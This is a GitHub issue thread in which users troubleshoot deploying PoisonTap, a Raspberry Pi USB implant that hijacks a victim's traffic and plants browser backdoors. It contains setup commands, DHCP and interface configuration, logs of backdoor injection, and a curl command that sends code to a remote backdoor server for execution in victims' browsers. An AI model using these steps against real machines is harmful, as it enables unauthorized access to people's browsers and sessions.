
Comments (28)

samyk avatar samyk commented on July 24, 2024 1

Hmm, there may be some initial setup that I forgot to cover -- check the modular section here:
https://gist.github.com/gbaman/50b6cca61dd1c3f88f41

from poisontap.

jr-k avatar jr-k commented on July 24, 2024 1

@samyk And what is the dhcpd.conf configuration ? I tried but the adapter gives to the user a 169.254.X.X address automatically...


extrapaint avatar extrapaint commented on July 24, 2024 1

I recommend splitting pi_startup.sh into a pi_config.sh and a bash script which is run on startup.
Also, you can add these lines to a config script to set up the pi as a usb gadget and install dependencies:

echo "dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait modules-load=dwc2,g_ether" > /boot/cmdline.txt
echo "" >> /boot/config.txt
echo "dtoverlay=dwc2" >> /boot/config.txt
apt-get update && apt-get upgrade
apt-get install dsniff isc-dhcp-server nodejs screen

I'm unsure exactly which package you use for the dhcp server- apt-get installs udhcpd when trying to install dhcpd. Also, there is a package node as well as a package nodejs.

The main issue I'm facing is the dhcp server daemon fails to start-- obviously we listen for dhcp requests on usb0, but I haven't deduced the scope yet.


JonathanNathanson avatar JonathanNathanson commented on July 24, 2024 1

@tomnick backend_server.js is a pretty simple script, if you read it you should be able to see how it works. I've not got anything open right now but I'm pretty sure you can just do a http request to:

yourserver.com:port/exec?your_code_here

See Samy's examples in the readme:

curl 'http://samy.pl:1337/exec?alert("muahahahaha")'


samyk avatar samyk commented on July 24, 2024 1

Try: sudo npm -g install websocket

Also, make sure you're on Node v6.


tomnick avatar tomnick commented on July 24, 2024 1

This is it...working...thanks a lot...


samyk avatar samyk commented on July 24, 2024

Also, dsniff (which contains dnsspoof), screen, node.js, and dhcpd need to be installed (via apt-get should be fine)


samyk avatar samyk commented on July 24, 2024

@jreziga Added dhcpd.conf in 838a035


samyk avatar samyk commented on July 24, 2024

@tomnick With @ForeverRising's instructions and 838a035 do things work properly for you?


samyk avatar samyk commented on July 24, 2024

I've also added some additional installation instructions in 26dd781


jr-k avatar jr-k commented on July 24, 2024

There are still issues on my side.

(Auto-assigned IP)

(IP address and mask)

DHCP server can't start well

not much information in the log...

dhcpd.conf is the same you just provided

Still troubleshooting I'll post here if I find smthg


samyk avatar samyk commented on July 24, 2024

Ah, also need to set the IP up:
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
Then reboot and test


jr-k avatar jr-k commented on July 24, 2024

@samyk I was writing a post to ask your /etc/network/interfaces file, nice move ;)

Edit: Alright it worked !


extrapaint avatar extrapaint commented on July 24, 2024

I used /etc/dhcpd.conf for the static IP. Does editing the interfaces file
work for you?

On Nov 18, 2016 3:45 PM, "jreziga" [email protected] wrote:

@samyk https://github.com/samyk I was writing a post to ask you your
/etc/network/interfaces file, nice move ;)



jr-k avatar jr-k commented on July 24, 2024

@ForeverRising dhcpd.conf goes inside /etc/dhcp/dhcpd.conf and not in /etc/dhcpd.conf

Plus you need to run echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces (try logged as root, I was unable to do this with that one line command using sudo)

And yes it worked.

@samyk I'm playing with it now. I'm still having some questions like :

  • If the victim has on his browser "nfl.com" opened. Is it working directly when you plug the Rpi ? Or does the user need to refresh the page on his browser ? (It seems like the 1st scenario isn't working or am I doing smthg wrong ?).

Edit: Solved. No refresh needed just patience for this one :D (but still the reverse websocket issue :c )

Also I've setup my server with port 1337 wide open but I can't get any reverse websocket connection.
In the Rpi logs I see that backdoor.html is injected

>>> Inject Backdoor HTML reverse ws 1337
Request: 1.0.0.1.pin.ip.samy.pl/PoisonTap
{ host: '1.0.0.1.pin.ip.samy.pl',
  connection: 'keep-alive',
  'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
  accept: 'image/webp,image/*,*/*;q=0.8',
  'accept-encoding': 'gzip, deflate, sdch',
  'accept-language': 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4' }

But nothing on the node server console output

Edit: Solved. My bad "Remotely Accessible Web-Based Backdoors" is available only for CDN js files included in webpages


extrapaint avatar extrapaint commented on July 24, 2024

I'll try again with a sudo su -. What does
ip a show with the static (set with the interfaces file)?

NFL.com seemed to reload every minute or so, I think it was chosen for the
example for this reason. I haven't looked at the source and meta tags for
the site though.

Also, I don't use newline characters in an echo command. Just habit for me.

On Nov 18, 2016 4:52 PM, "jreziga" [email protected] wrote:

@ForeverRising https://github.com/foreverrising dhcpd.conf goes inside
/etc/dhcp/dhcpd.conf and no /etc/dhcpd.conf

Plus you need to run echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0
inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >>
/etc/network/interfaces (try logged as root, I was unable to do this with
this one line command with sudo)

And yes it worked.

@samyk https://github.com/samyk I'm playing with it now. I'm still
having some questions like :

  • If the victim had on his browser "nfl.com" opened. Is it working
    directly when you plug the Rpi ? Or do the user need to refresh the page on
    his browser ? (It seems like the 1st scenario isn't working or am I doing
    smthg wrong ?)

I've setup my server with port 1337 wide open but I can't get any reverse
websocket connection.
In the Rpi logs I see that backdoor.html is injected

Inject Backdoor HTML reverse ws 1337
Request: 1.0.0.1.pin.ip.samy.pl/PoisonTap
{ host: '1.0.0.1.pin.ip.samy.pl',
connection: 'keep-alive',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
accept: 'image/webp,image/*,*/*;q=0.8',
'accept-encoding': 'gzip, deflate, sdch',
'accept-language': 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4' }

But nothing on the node server console output



jr-k avatar jr-k commented on July 24, 2024

@ForeverRising I've made a small installation guide. Check at the bottom of this page: https://github.com/jreziga/poisontap/blob/068c2836deb61b150946acf3395ccf11eb3b3ad1/README.md


tomnick avatar tomnick commented on July 24, 2024

Alright, mine is running now like a charm... is there any instruction on how to use the tools like backend_server.js or how to access remotely etc?


samyk avatar samyk commented on July 24, 2024

Also note the backdoor has jQuery built in so you have full access to jQuery functionality


tomnick avatar tomnick commented on July 24, 2024

Which websocket library is the project based on?


samyk avatar samyk commented on July 24, 2024

https://www.npmjs.com/package/websocket


tomnick avatar tomnick commented on July 24, 2024

Getting this error on my server trying to install in the directory "poisontap" with the "backend_server.js" file included only:

npm install websocket

[email protected] install /root/node_modules/websocket
(node-gyp rebuild 2> builderror.log) || (exit 0)

/root
├── [email protected]
└── [email protected]

npm WARN enoent ENOENT: no such file or directory, open '/root/package.json'
npm WARN root No description
npm WARN root No repository field.
npm WARN root No README data
npm WARN root No license field.


extrapaint avatar extrapaint commented on July 24, 2024

Should add package npm to the apt-get line of the script and a npm -g
websocket line as well.

On Nov 20, 2016 12:45 PM, "tomnick" [email protected] wrote:

This is it...working...thanks a lot...



JonathanNathanson avatar JonathanNathanson commented on July 24, 2024

Worth noting that the ReadMe says that NodeJS may already be installed. Yes, it is, but a very old version (0.10.29??) so you need to install this v6.

First you need to remove all references to the current version 👍
sudo apt-get remove nodered -y
sudo apt-get remove nodejs nodejs-legacy -y
sudo apt-get remove npm -y

then:

wget https://nodejs.org/dist/latest-v6.x/node-v6.9.1-linux-armv6l.tar.gz
tar -xvf node-v6.9.1-linux-armv6l.tar.gz
cd node-v6.9.1-linux-armv6l
sudo cp -R * /usr/local/
sudo reboot

Now you have an updated version of Node that will run just fine.


tomnick avatar tomnick commented on July 24, 2024

Did exactly what you wrote and the results after reboot are:

node -v
The program 'node' is currently not installed. You can install it by typing:
apt install nodejs-legacy

So after I did install nodejs-legacy:

node -v
v4.2.6

No v6!


JonathanNathanson avatar JonathanNathanson commented on July 24, 2024

I've just reformatted so that it's obvious that each is a separate command, can't just copy and paste the whole line...

Pretty sure you need v6 and up.


tomnick avatar tomnick commented on July 24, 2024

Which directory to unpack the top Alexa?


cksj avatar cksj commented on July 24, 2024

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
net.ipv4.ip_forward = 1

How do you solve this problem? Ask the great god for help
